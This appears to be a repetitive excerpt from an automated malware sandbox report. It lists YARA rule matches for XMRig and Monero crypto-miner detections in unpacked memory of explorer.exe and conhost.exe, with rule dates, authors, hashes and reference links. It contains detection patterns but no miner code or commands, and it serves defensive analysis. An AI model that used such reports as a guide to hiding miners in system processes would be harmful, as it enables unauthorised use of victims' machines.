                  Source: 17.2.conhost.exe.2019125ca38.11.raw.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 17.2.conhost.exe.2019125ca38.11.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 17.2.conhost.exe.2019125ca38.11.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 28.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 27.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.2.explorer.exe.140000000.0.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.2.explorer.exe.140000000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 28.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 27.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 27.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 27.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 28.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 17.2.conhost.exe.20190d5ca00.10.raw.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 17.2.conhost.exe.20190d5ca00.10.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 17.2.conhost.exe.20190d5ca00.10.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 27.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 28.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 28.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 27.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 21.2.conhost.exe.224e882d2d0.7.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 21.2.conhost.exe.224e882d2d0.7.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 28.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 27.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 28.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 21.2.conhost.exe.224e8d2d308.8.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 21.2.conhost.exe.224e8d2d308.8.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 27.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 27.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
